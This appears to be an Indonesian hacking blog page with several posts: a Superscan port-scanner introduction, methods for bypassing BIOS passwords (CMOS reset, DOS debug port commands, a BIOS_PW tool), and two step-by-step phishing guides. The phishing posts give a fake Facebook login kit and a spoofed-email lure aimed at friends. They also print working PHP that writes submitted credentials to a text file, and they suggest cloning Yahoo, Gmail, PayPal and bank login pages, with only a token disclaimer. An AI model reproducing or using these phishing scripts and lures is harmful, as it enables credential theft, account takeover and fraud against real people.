Superscan banyak digunakan sebagai TCP Port Scanner, pinger dan resolver. Superscan adalah tools terpopuler di windows untuk masalah port scanner. Jika anda pemula dan merasa tidak nyaman menggunakan nMap dengan tampilanya yang hanya berupa text, maka Superscan adalah alternatif penggantinya dengan tampilan interface yang mudah dipahami. Silakan kunjungi situs resminya disini dan download Programnya disini.



Read more...

Hack Bios Password


Ada beberapa cara yang dapat digunakan untuk mereset Password pada Bios. Dari cara manual dengan bongkar pasang batere sampai cara unik membongkar password pada laptop. Oke langsung saja akan saya bahas satu persatu dari yang paling mudah sampai yang sedikit rumit namun sebenarnya asik untuk dicoba.


1. Clear CMOS
Cara ini kuanggap cara paling kuno sekaligus paling mudah untuk menjebol password pada BIOS. Langkahnya mudah saja, pertama buka casing penutup CPU komputer. Kemudian cari Batere bios yang bentuknya mirip-mirip dengan batere jam cuma sedikit lebih gede. Setelah ketemu perhatikan daerah di sekitar batere biasanya terdapat jumper dengan 3 pin, 2 pin terhubung dan 1 pin tidak.

Misalkan 3 pin tersebut dengan kode 1 - 2 - 3. Posisi konektor awal yang terhubung biasanya adalah 2 - 3. Untuk mereset bios caranya pindahkan posisi konektor yang menghubungkan pin 2 - 3 ke posisi 1 - 2 selama kurang lebih 5 detik. Kemudian pasang kembali ke posisi awal (2 - 3). Coba restart kembali komputer, dijamin password bios sudah lenyap.

Jika cara di atas terlihat rumit, mudahnya untuk menclear cmos adalah dengan mencopot batere BIOS kemudian memasangnya kembali. Namun dengan konsekuensi mencopot label garansi pada batere bios tersebut.

2. Reset lewat DOS
Cara kedua yang biasa digunakan adalah mereset password bios melalui command prompt DOS. Masuk terlebih dahulu ke DOS dengan mengakses Start - All program - accessoris - Command Prompt. Atau untuk lebih cepatnya masuk ke run - cmd.

Setelah jendela command prompt muncul, ketik debug kemudian enter. Lanjutkan dengan menjalankan perintah berikut ini.

o 70 10
o 71 20
quit
exit

Lihat hasilnya, bios yang terpassword telah menghilang dari pandangan.
catatan: Jika tidak bisa masuk ke windows untuk mengakses command prompt dapat dilakukan melalui safe mode with command prompt yang bisa diakses dengan menekan tombol F8 sebelum login windows.

3. BIOS_PW
Cara ketiga ini saya dapatkan dari artikel yang dibuat oleh Mas Mamas. Penggunaan software ini sangat manjur untuk jenis BIOS phoenix, misalnya BIOS yang digunakan pada laptop Acer. Untuk menggunakanya harus menggunakan komputer lain yang normal.

Download terlebih dahulu softwarenya disini. Ekstrak hasil file BIOS.rar yang telah di download kemudian pindahkan file BIOS_PW.exe ke partisi D:

Masuk ke BIOS komputer yang BIOSnya terpassword. Tekan saja tombol enter berulang ulang sampai muncul pesan "system disabled [14662]". (kode error)

Langkah selanjutnya masuk ke komputer yang telah dicopykan software BIOS_PW.exe ke direktori D: . Masuk ke command prompt kemudian ketik perintah berikut ini.
D:
BIOS_PW 14662 0
Maka akan muncul beberapa kombinasi password yang bisa digunakan untuk membuka password phoenix tersebut.
Selamat mencoba



Read more...

Hacking facebook dengan fake login


Kemaren sempat hunting ke lorong bawah tanah. Say hi!... dengan teman lama satu perjuangan. Hasilnya adalah sebuah script menarik untuk membuat fake login di facebook. Langsung saja, sebenarnya teknik penggunaan fakelogin untuk mencuri username dan password telah saya bahas di artikel sebelumnya, silakan baca disini. Jika pada sebelumnya adalah teori dasar membuat fake login, pada artikel ini akan saya berikan script sekaligus prakteknya.

Hal pertama yang harus dilakukan adalah memiliki webhosting yang support php dan tidak menampilkan iklan popup. Kamu bisa menggunakan yang free, misalnya: byethost, Ripway, Geocities, dll. Langkah selanjutnya download script fake login lengkap disini.

Setelah di ekstrak terdapat tiga file yaitu index.html, logs.php dan logs.txt. Simpan kedalam salah satu direktori dalam web hosting. Misalnya http://namawebhosting.com/facebook. Catat alamat link tersebut.

Selanjutnya adalah membuat email palsu. Patikan nama depan dan nama belakang yang anda gunakan adalah Facebook. Hal ini memastikan penerima email tidak ragu terhadap pengirim email. Misalnya email palsu anda adalah admin_facebook@yahoo.co.id . Setelah itu, download contoh isi email palsu yang berisi pemberitahuan konfirmasi pertemanan, dapat anda Download Disini.

Buka cantoh isi email palsu tersebut, kemudian ganti Nama yang warna merah dengan nama palsu anda. Dan ganti alamat email palsu yang warna merah dengan alamat email palsu anda. Copy isi email palsu tersebut ke kotak pengiriman email anda.

Selanjutnya perhatikan link yang ada dalam isi pesan, seperti ini: http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2. Blok alamat link tersebut dan arahkan ke alamat fake login yang telah anda buat sebelumnya.

Ini adalah contoh halaman Fake Login yang telah jadi

Selesai, kirim email palsu tersebut ke email teman yang memiliki account facebook. Biarkan mereka membukanya dan mengklik link tersebut dan dipastikan username dan password mereka akan terjaring.

Selamat Mencoba...

Catatan:
Artikel ini hanyalah sekelumit ilmu yang cukup diketahui tapi jangan dipraktekan. Apalagi untuk disalahgunakan.



Read more...

hack account dengan fake login


saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....



Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.


Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama
Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:


Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
Sumber:idecapung blog



Read more...

Sponsored link:

Get $$$ just clik and register hehe:

IP track:

Get Bonus:

List:

 

About This Blog


counter map
HYBRID Blog's Copyright © 2009 Blogger Template Designed by Bie Blogger Template